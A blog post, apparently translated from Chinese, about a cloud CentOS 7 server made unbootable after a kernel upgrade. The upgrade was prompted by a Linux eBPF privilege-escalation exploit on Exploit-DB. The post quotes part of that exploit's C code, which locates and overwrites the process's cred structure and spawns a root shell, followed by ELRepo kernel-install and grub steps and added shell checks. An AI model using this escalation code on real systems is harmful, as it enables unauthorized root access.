Outcome

The Alibaba Cloud server (CentOS 7) had to be reinstalled

Impact on me

The website data went from 1 to 0: the domains htwyy.cn (hexo), www.htwyy.cn (wordpress), ***lim.htwyy.cn*** (library) and api.htwyy.cn (api) lost all their data

Cause

It starts with this site: Exploit Database, the exploit database that Kali's tooling draws on
![Pasted image 20221129105755.png](/img/Pasted image 20221129105755.png)
As the screenshot shows, there is a local privilege escalation for Linux kernels below 4.13.9 (Ubuntu 16.04 / Fedora 27)

![Pasted image 20221129110241.png](/img/Pasted image 20221129110241.png)
That is, an ordinary user becomes root (the highest privilege)

```c
/* Fragment of the Exploit-DB entry as quoted in the original post. The middle
 * of the file, including the start of find_cred() and the read64()/write64()
 * kernel memory primitives it relies on, is elided there. */
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

/* ... (elided in the original post) ... */

    /*
     * scan forward for expected sk_rcvtimeo value.
     *
     * struct sock {
     * [...]
     * const struct cred *sk_peer_cred;
     * long sk_rcvtimeo;
     * };
     */
    for (int i = 0; i < 100; i++, sock_addr += 8) {
        /* 0x7FFFFFFFFFFFFFFF is MAX_SCHEDULE_TIMEOUT, the default sk_rcvtimeo;
         * it is used as a sentinel to find the field inside the struct sock */
        if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) {
            /* the word just before it should be the sk_peer_cred pointer */
            unsigned long cred_struct = read64(sock_addr - 8);
            if(cred_struct < PHYS_OFFSET) {
                continue;   /* not a kernel address: sentinel false positive */
            }

            /* cross-check the candidate cred against the caller's own uid
             * before trusting the hit */
            unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);

            if(test_uid != uid) {
                continue;
            }
            msg("Sock->sk_rcvtimeo at offset %d\n", i * 8);
            msg("Cred structure at %llx\n", cred_struct);
            msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid);

            return cred_struct;
        }
    }
    fail("failed to find sk_rcvtimeo.\n");
}

/* overwrite the located struct cred so the current task becomes root */
static void
hammer_cred(unsigned long addr) {
    msg("hammering cred structure at %llx\n", addr);
#define w64(w) { write64(addr, (w)); addr += 8; }
    /* keep the low 32 bits (the usage count), zero the high 32 bits (uid) */
    unsigned long val = read64(addr) & 0xFFFFFFFFUL;
    w64(val);
    /* zero the remaining id fields (gid, suid, sgid, euid, egid, fsuid, fsgid) */
    w64(0); w64(0); w64(0); w64(0);
    /* fill the capability bitmaps that follow with all ones */
    w64(0xFFFFFFFFFFFFFFFF);
    w64(0xFFFFFFFFFFFFFFFF);
    w64(0xFFFFFFFFFFFFFFFF);
#undef w64
}

int
main(int argc, char **argv) {
    initialize();
    hammer_cred(find_cred());
    msg("credentials patched, launching shell...\n");
    /* the patched credentials are inherited by the spawned shell */
    if(execl("/bin/sh", "/bin/sh", NULL)) {
        fail("exec %s\n", strerror(errno));
    }
}
```

Part of the privilege-escalation code; the full version is linked here
So evidently, I thought, any Linux kernel below 4.10 should have this vulnerability too, and I went to check the kernel version of my Alibaba Cloud server

```
Linux iZuf68v6tepfikkhntiacqZ 3.10.0-1160.80.1.el7.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 25 12:10:41 EST 2022 x86_64 x86_64 x86_64 GNU/Linux
```

The cloud server's kernel is 3.10.0-1160.80.1.el7, the CentOS 7 distribution kernel. A version number alone does not settle whether such a kernel is affected: the exploit works through the bpf() system call (hence the linux/bpf.h include above) against a bug in the upstream eBPF verifier, while Red Hat kernels keep the 3.10.0 base version and backport fixes and features selectively, and unprivileged bpf() can also be switched off with the kernel.unprivileged_bpf_disabled sysctl on kernels that expose it. The vendor advisory for the CVE listed on the Exploit-DB entry, or rpm -q --changelog kernel, answers the question; uname does not.
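As an added example (not code from the original post or from the Exploit-DB entry), a POSIX sh helper that does the version comparison the text above did by eye, and flags the case that makes the comparison misleading here: a vendor kernel whose base version sits in the affected range. The threshold 4.13.9 is taken from the exploit title; the `.elN` suffix test and the three verdict strings are this example's own convention.

```shell
#!/bin/sh
# Added example, not from the original post: compare a kernel release string
# (as printed by uname -r) against an upstream version threshold and say
# whether that comparison even means anything for this kind of kernel.

# kver_base REL: drop the distribution suffix,
# "3.10.0-1160.80.1.el7.x86_64" -> "3.10.0"
kver_base() {
    printf '%s\n' "$1" | sed 's/-.*//'
}

# kver_lt A B: exit 0 when upstream version A is numerically below B,
# comparing component by component (4.9 < 4.13, which a string compare gets wrong)
kver_lt() {
    awk -v a="$(kver_base "$1")" -v b="$(kver_base "$2")" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i in x) ? x[i] + 0 : 0
            yi = (i in y) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1   # equal: not below
    }'
}

# kernel_verdict REL THRESHOLD: prints one of three strings (this example's own convention)
#   not-in-upstream-range       base version >= threshold
#   in-upstream-range           base version < threshold, upstream-style kernel
#   in-range-but-vendor-kernel  base version < threshold but an .elN (RHEL/CentOS)
#                               build, which backports fixes without bumping the base
kernel_verdict() {
    if ! kver_lt "$1" "$2"; then
        echo not-in-upstream-range
    elif printf '%s\n' "$1" | grep -q '\.el[0-9]'; then
        echo in-range-but-vendor-kernel
    else
        echo in-upstream-range
    fi
}

# The release string from the post, against the threshold in the exploit title:
kernel_verdict 3.10.0-1160.80.1.el7.x86_64 4.13.9
# The machine running this script:
kernel_verdict "$(uname -r)" 4.13.9
```

For the post's own uname line the verdict is in-range-but-vendor-kernel, which is the cue to read the vendor advisory or rpm -q --changelog kernel rather than to assume the exploit applies. kver_base drops everything after the first '-', so 3.10.0-1160.80.1.el7.x86_64 compares as 3.10.0.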

Upgrade process

This procedure follows documents found through a Google search

  1. Update the installed packages with yum

    ```sh
    yum -y update
    ```

    The -y option answers yes automatically wherever a confirmation would be asked

  2. Enable the ELRepo repository

    ```sh
    rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org

    rpm -Uvh http://www.elrepo.org/elrepo-release-7.0-2.el7.elrepo.noarch.rpm
    ```

    The first command imports ELRepo's package-signing key so that the release package can be verified; the second installs the repository definition. If the rpm command is not found, yum -y install rpm

  3. List the available kernel packages

    ```sh
    yum --disablerepo="*" --enablerepo="elrepo-kernel" list available
    ```

    Output (partial):

    ```
    Loaded plugins: fastestmirror
    Loading mirror speeds from cached hostfile
    * elrepo-kernel: mirrors.tuna.tsinghua.edu.cn
    Available Packages
    elrepo-release.noarch 7.0-6.el7.elrepo elrepo-kernel
    kernel-lt.x86_64 5.4.225-1.el7.elrepo elrepo-kernel
    kernel-lt-devel.x86_64 5.4.225-1.el7.elrepo elrepo-kernel
    kernel-lt-doc.noarch 5.4.225-1.el7.elrepo elrepo-kernel
    kernel-lt-tools.x86_64 5.4.225-1.el7.elrepo elrepo-kernel
    kernel-lt-tools-libs.x86_64 5.4.225-1.el7.elrepo elrepo-kernel
    kernel-lt-tools-libs-devel.x86_64 5.4.225-1.el7.elrepo elrepo-kernel
    kernel-ml-devel.x86_64 6.0.10-1.el7.elrepo elrepo-kernel
    kernel-ml-doc.noarch 6.0.10-1.el7.elrepo elrepo-kernel
    kernel-ml-headers.x86_64 6.0.10-1.el7.elrepo elrepo-kernel
    kernel-ml-tools.x86_64 6.0.10-1.el7.elrepo elrepo-kernel
    ```

  4. Install the kernel

    Install the newest mainline kernel:

    ```sh
    yum --enablerepo=elrepo-kernel install kernel-ml
    ```

    ml = mainline stable, the newest upstream release (6.0.10 in the listing above)
    lt = long term support, an upstream LTS branch (5.4.225 in the listing above)

    To install a specific kernel, replace kernel-ml with the package wanted, e.g. kernel-lt.x86_64

  5. Make the new kernel the default boot entry

    List the kernels grub knows about:

    ```sh
    sudo awk -F\' '$1=="menuentry " {print i++ " : " $2}' /etc/grub2.cfg
    ```

    Output:

    ```
    # sudo awk -F\' '$1=="menuentry " {print i++ " : " $2}' /etc/grub2.cfg
    0 : CentOS Linux (6.0.10-1.el7.elrepo.x86_64) 7 (Core)
    1 : CentOS Linux (3.10.0-1160.80.1.el7.x86_64) 7 (Core)
    2 : CentOS Linux (3.10.0-1062.18.1.el7.x86_64) 7 (Core)
    3 : CentOS Linux (3.10.0-1062.el7.x86_64) 7 (Core)
    4 : CentOS Linux (0-rescue-20200426154603174201708213343640) 7 (Core)
    ```

    Entry 0, the freshly installed 6.0.10 kernel, is already in the menu at this point because the kernel package adds its entry to grub.cfg on installation (/etc/grub2.cfg is a symlink to /boot/grub2/grub.cfg on a BIOS-booted CentOS 7).

    Set it in grub2:

    ```sh
    sudo grub2-set-default 0
    ```

    0 means entry 0 : CentOS Linux (6.0.10-1.el7.elrepo.x86_64) 7 (Core), the kernel to boot

    Edit the grub defaults file:

    ```sh
    vim /etc/default/grub
    ```

    ```
    GRUB_TIMEOUT=1
    GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
    GRUB_DEFAULT=0
    GRUB_DISABLE_SUBMENU=true
    GRUB_TERMINAL_OUTPUT="console"
    GRUB_CMDLINE_LINUX="crashkernel=auto spectre_v2=retpoline rhgb quiet net.ifnames=0 console=tty0 console=ttyS0,115200n8 noibrs nvme_core.io_timeout=4294967295 nvme_core.admin_timeout=4294967295"
    GRUB_DISABLE_RECOVERY="true"
    ```

    Set GRUB_DEFAULT=0, save and exit. In the file shown it is already 0. Note that grub2-set-default only takes effect when GRUB_DEFAULT=saved; with a numeric index grub boots that index and ignores the saved entry.

    Generate the grub configuration file:

    ```sh
    sudo grub2-mkconfig -o /boot/grub2/grub.cfg
    ```

    On success the command prints "Generating grub configuration file ...", one "Found linux image:" / "Found initrd image:" pair per kernel it finds, and "done"; the new kernel should appear in that list. A run that prints nothing is a sign that something went wrong, not of success. On a UEFI system the target file is /boot/efi/EFI/centos/grub.cfg instead.

    Reboot:

    ```sh
    sudo reboot
    ```
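As an added example, not part of the original post: the checks to run between making the new kernel the default and typing sudo reboot. For a given kernel release it verifies that /boot holds a non-empty kernel image and initramfs, that grub.cfg contains an entry booting that image, and that the index written to GRUB_DEFAULT actually selects it (same numbering as the awk one-liner above). All paths are parameters, and make_fixture builds a constructed stand-in for /boot so the script runs on any machine; the real invocation is given in the comments.

```shell
#!/bin/sh
# Added example, not from the original post: what to verify between making a
# new kernel the grub default and typing "sudo reboot". Every path is a
# parameter so the checks can run against a constructed directory here; on a
# real BIOS-booted CentOS 7 host the call is
#   preflight /boot /boot/grub2/grub.cfg 6.0.10-1.el7.elrepo.x86_64 0
# (on UEFI the grub.cfg is /boot/efi/EFI/centos/grub.cfg instead).

# file_ok PATH: exists and is non-empty; a 0-byte initramfs is as fatal as a missing one
file_ok() { [ -s "$1" ]; }

# default_entry_title GRUBCFG INDEX: title of menuentry number INDEX, using the
# same numbering as the awk one-liner in the post
default_entry_title() {
    awk -F"'" -v n="$2" '$1 == "menuentry " { if (i++ == n) print $2 }' "$1"
}

# preflight BOOTDIR GRUBCFG KVER [INDEX]
# exit 0 when kernel image, initramfs and a grub entry booting that image all
# exist and, if INDEX (the value of GRUB_DEFAULT) is given, that entry is the
# new kernel; otherwise report every problem found and exit 1
preflight() {
    bootdir=$1; grubcfg=$2; kver=$3; rc=0
    file_ok "$bootdir/vmlinuz-$kver" ||
        { echo "missing or empty $bootdir/vmlinuz-$kver"; rc=1; }
    file_ok "$bootdir/initramfs-$kver.img" ||
        { echo "missing or empty initramfs-$kver.img (dracut -f $bootdir/initramfs-$kver.img $kver)"; rc=1; }
    if ! grep -q "vmlinuz-$kver" "$grubcfg" 2>/dev/null; then
        echo "$grubcfg has no entry booting vmlinuz-$kver (rerun grub2-mkconfig -o $grubcfg)"; rc=1
    fi
    if [ -n "$4" ]; then
        title=$(default_entry_title "$grubcfg" "$4")
        case $title in
            *"$kver"*) ;;
            *) echo "GRUB_DEFAULT=$4 selects '$title', not $kver"; rc=1 ;;
        esac
    fi
    return $rc
}

# make_fixture DIR: constructed stand-in for /boot plus a grub.cfg with the two
# kernels from the post's menu listing (not a real system)
make_fixture() {
    new=6.0.10-1.el7.elrepo.x86_64
    old=3.10.0-1160.80.1.el7.x86_64
    for k in $new $old; do
        printf 'fake-kernel' > "$1/vmlinuz-$k"
        printf 'fake-initrd' > "$1/initramfs-$k.img"
    done
    {
        for k in $new $old; do
            printf "menuentry 'CentOS Linux (%s) 7 (Core)' --class centos {\n" "$k"
            printf "\tlinux16 /vmlinuz-%s root=/dev/vda1 ro crashkernel=auto\n" "$k"
            printf "\tinitrd16 /initramfs-%s.img\n}\n" "$k"
        done
    } > "$1/grub.cfg"
}

# Demonstration on the fixture: entry 0 is the new kernel and passes; pointing
# GRUB_DEFAULT at entry 1 (the old kernel) is caught.
dir=$(mktemp -d)
make_fixture "$dir"
preflight "$dir" "$dir/grub.cfg" 6.0.10-1.el7.elrepo.x86_64 0 && echo "fixture: safe to reboot"
preflight "$dir" "$dir/grub.cfg" 6.0.10-1.el7.elrepo.x86_64 1 || echo "fixture: do not reboot"
rm -rf "$dir"
```

Two habits make the checks above far less important: take a cloud snapshot before touching the kernel, so the worst case is a rollback instead of a reinstall, and boot a new kernel the first time with sudo grub2-reboot 0 rather than grub2-set-default. grub2-reboot selects the entry for the next boot only, so if the kernel does not come up, a reset from the cloud console returns to the previous default.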

而我重启却,无法启动……

Incident analysis

The grub configuration was not generated correctly, so the grub boot loader hit an error while running and the system could not boot into the OS

So what does the Linux boot process look like?
![[Pasted image 20221129140610.png]]

The default boot kernel was changed, but the corresponding configuration was not generated properly

So at the GRUB Stage 2 boot phase shown in the figure above, grub could not find the relevant commands, could not set up the initial (virtual) file system, and could not hand control to the kernel

Two details from the upgrade steps bear on this analysis: the grub menu already listed the 6.0.10 entry before grub2-mkconfig was run, so the entry itself existed, and GRUB_DEFAULT was already 0. Whether that entry's kernel image and initramfs were actually bootable on this VM is the question a reinstall leaves unanswered.

Rescue attempts

After a lot of googling about grub rescue mode, it all ended in failure
Which meant the Alibaba Cloud CentOS 7 server could not boot into the system

  1. Option one [x]
    ![[Pasted image 20221129143900.png]]
    Google-translated:
    ![[Pasted image 20221129143937.png]]
    Since the server is only reachable remotely, reinstalling the GRUB boot loader from a USB stick is not possible

  2. Option two [x]
    Repair from the grub command line
    ![[Pasted image 20221129153219.png]]
    For the detailed commands, see
    the official site

  3. Option three [√]
    Alibaba Cloud server snapshot [x]
    Reinstall the system, which solves 99% of problems
    And that is how the halo blog came about